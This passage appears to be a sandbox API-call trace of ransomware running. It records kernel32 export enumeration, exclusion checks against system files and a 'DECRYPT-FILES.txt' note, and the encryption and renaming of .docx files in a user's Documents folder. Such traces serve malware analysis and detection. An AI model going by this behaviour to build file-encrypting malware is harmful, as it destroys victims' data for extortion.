(in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.047] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.047] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.047] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.047] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.047] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.047] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.048] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.048] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.048] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.048] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.048] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.048] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.048] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.048] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.048] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.048] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.048] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.048] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.048] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.048] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.048] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.048] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.048] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.048] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.049] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.049] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.049] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.049] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.049] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.049] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.049] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.049] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.049] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.050] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.050] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.050] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.050] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.050] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.050] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.050] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.050] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.050] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.050] lstrlenA (lpString="DELETEATOM") returned 10 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.050] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.050] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.050] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.050] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.050] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.050] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.050] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.050] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.051] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.051] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.051] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.051] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.051] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.051] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.051] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.051] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.051] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.051] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.051] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.051] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.051] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.051] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.051] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.051] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.051] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.051] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.051] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.052] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.052] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.052] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.052] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.052] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.052] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.052] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.052] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.052] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.052] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.052] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.052] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.052] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.052] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.053] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx") returned 74 [0084.053] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx.6QCk2n") returned 81 [0084.053] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\tfbgpunntue.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx.6QCk2n" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\tfbgpunntue.docx.6qck2n"), dwFlags=0x0) returned 1 [0084.053] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.053] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.054] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.054] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf806cb0, ftCreationTime.dwHighDateTime=0x1d4cad0, ftLastAccessTime.dwLowDateTime=0xdca4f820, ftLastAccessTime.dwHighDateTime=0x1d4c696, ftLastWriteTime.dwLowDateTime=0xdca4f820, ftLastWriteTime.dwHighDateTime=0x1d4c696, nFileSizeHigh=0x0, nFileSizeLow=0xa611, dwReserved0=0x0, dwReserved1=0x0, cFileName="VJDs-wsG_jZz.docx", cAlternateFileName="VJDS-W~1.DOC")) returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="autorun.inf") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="boot.ini") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="desktop.ini") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="ntuser.dat") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="iconcache.db") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="bootsect.bak") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="ntuser.dat.log") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="thumbs.db") returned 1 [0084.054] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx", lpString2="Bootfont.bin") returned 1 [0084.054] lstrlenW (lpString="VJDs-wsG_jZz.docx") returned 17 [0084.054] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.054] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.054] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.054] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.054] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0084.054] lstrlenW (lpString="VJDs-wsG_jZz.docx") returned 17 [0084.054] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0084.054] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="VJDs-wsG_jZz.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx" [0084.054] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\vjds-wsg_jzz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.055] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=42513) returned 1 [0084.055] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.055] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.055] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.055] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.055] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.055] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.055] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.056] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.057] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.057] CloseHandle (hObject=0x42c) returned 1 [0084.057] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.057] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.058] CloseHandle (hObject=0x0) returned 0 [0084.058] CloseHandle (hObject=0x428) returned 1 [0084.058] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.058] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.059] GetTickCount () returned 0x114d7aa [0084.059] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.059] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.059] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.059] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.059] lstrlenA (lpString="kernel32.dll") returned 12 [0084.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.060] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.060] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.060] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.060] lstrlenA (lpString="ADDATOMA") returned 8 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.060] lstrlenA (lpString="ADDATOMW") returned 8 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: 